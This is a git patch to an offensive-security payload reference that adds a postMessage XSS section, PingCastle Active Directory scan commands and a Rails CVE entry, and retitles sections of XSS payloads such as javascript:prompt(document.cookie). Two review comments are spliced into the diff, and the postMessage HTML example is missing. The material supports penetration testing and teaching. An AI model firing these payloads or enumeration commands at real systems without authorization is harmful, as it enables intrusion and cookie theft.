From bd449e9cead1312d39e6f861ecf0e53596b541fd Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 3 Aug 2019 23:22:14 +0200
Subject: [PATCH] XSS PostMessage
---
 .../Active Directory Attack.md | 4 ++
 README.md | 2 +-
 XSS Injection/README.md | 45 +++++++++++++++----
 3 files changed, 42 insertions(+), 9 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 56f32db6..6dae309e 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -91,6 +91,10 @@
 ```powershell
 pingcastle.exe --healthcheck --server --user --password --advanced-live --nullsession
+ pingcastle.exe --healthcheck --server domain.local
+ pingcastle.exe --graph --server domain.local
+ pingcastle.exe --scanner scanner_name --server domain.local
+ available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup
 ```
 * [Kerbrute](https://github.com/ropnop/kerbrute)
diff --git a/README.md b/README.md
index 32796662..f6586c43 100644
--- a/README.md
+++ b/README.md
@@ -34,7 +34,6 @@ You might also like the `Methodology and Resources` folder :
 - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
 - Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
- - Apache Struts 2 CVE-2017-5638.py
 - Apache Struts 2 CVE-2017-9805.py
 - Apache Struts 2 CVE-2018-11776.py
 - Docker API RCE.py
@@ -43,6 +42,7 @@ You might also like the `Methodology and Resources` folder :
 - JBoss CVE-2015-7501.py
 - Jenkins CVE-2015-8103.py
 - Jenkins CVE-2016-0792.py
+ - Rails CVE-2019-5420.rb
 - Shellshock CVE-2014-6271.py
 - Tomcat CVE-2017-12617.py
 - WebLogic CVE-2016-3510.py
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 51695bae..3a5a9f5b 100644
--- a/XSS Injection/README.md
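Review bot: The scanner list on the last added line of the Active Directory hunk names `ullsession`, which looks like a typo for `nullsession` — the flag `--nullsession` is spelled out on the context line above and `nullsession-trust` follows it in the same list — so a reader who pastes `--scanner ullsession` will get an unknown-scanner error from PingCastle. I would correct the line to `available scanners are: aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,nullsession,nullsession-trust,share,smb,spooler,startup`. That line also sits inside the ` ```powershell ` fence next to real commands; prefixing it with `#` would mark it as a comment rather than something to run. I have not verified the remaining scanner names against the PingCastle release current at the commit date, so they may also need a check.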
+++ b/XSS Injection/README.md @@ -13,6 +13,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) +- [XSS in PostMessage](#xss-in-postmessage) - [Blind XSS](#blind-xss) - [XSS Hunter](#xss-hunter) - [Other Blind XSS tools](#other-blind-xss-tools) @@ -262,7 +263,7 @@ vbscript:msgbox("XSS") ``` -XSS in XML +### XSS in XML ```xml @@ -273,7 +274,7 @@ XSS in XML ``` -XSS in SVG +### XSS in SVG ```xml @@ -287,7 +288,7 @@ XSS in SVG ``` -XSS in SVG (short) +### XSS in SVG (short) ```javascript @@ -297,7 +298,7 @@ XSS in SVG (short) </title><script>alert(3)</script> ``` -XSS in Markdown +### XSS in Markdown ```csharp [a](javascript:prompt(document.cookie)) @@ -306,7 +307,7 @@ XSS in Markdown [a](javascript:window.onerror=alert;throw%201) ``` -XSS in SWF flash application +### XSS in SWF flash application ```powershell Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); @@ -316,7 +317,7 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali more payloads in ./files -XSS in SWF flash application +### XSS in SWF flash application ``` flashmediaelement.swf?jsinitfunctio%gn=alert`1` @@ -337,7 +338,7 @@ flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// ``` -XSS in CSS +### XSS in CSS ```html @@ -356,6 +357,33 @@ div { ``` +## XSS in PostMessage + +> If the target origin is asterisk * the message can be sent to any domain has reference to the child page. + +```html + + + + + + + +``` + ## Blind XSS ### XSS Hunter 
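Review bot: The quoted sentence under `## XSS in PostMessage` only covers the sender side (a `targetOrigin` of `*`), but postMessage XSS arises on the receiving side: a `message` listener that writes `event.data` into the DOM or passes it to `eval`/`innerHTML` without checking `event.origin` can be driven by any page that holds a reference to the window (its parent, its opener, or a frame that embeds it). I would reword it to `> A message listener that uses event.data without validating event.origin can be triggered by any page holding a reference to the window; sending with targetOrigin '*' additionally leaks the message to whatever is currently loaded in the target frame.` and add the defensive check readers should look for, `if (event.origin !== 'https://trusted.example') return;`, with a note that substring checks such as `event.origin.indexOf('trusted.example') !== -1` are bypassable via attacker-controlled hostnames. The HTML example in this hunk did not survive extraction in this copy, so I cannot confirm what the payload demonstrates; the sentence as written also has a grammar slip (`any domain has reference` → `any page that has a reference`).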
@@ -1002,6 +1030,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow
 - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett
 - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html)
+- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
 - [postMessage XSS Bypass](https://hackerone.com/reports/231053)
 - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin
 - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans
@@ -1014,4 +1043,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
 - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
 - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
-- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
+- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
\ No newline at end of file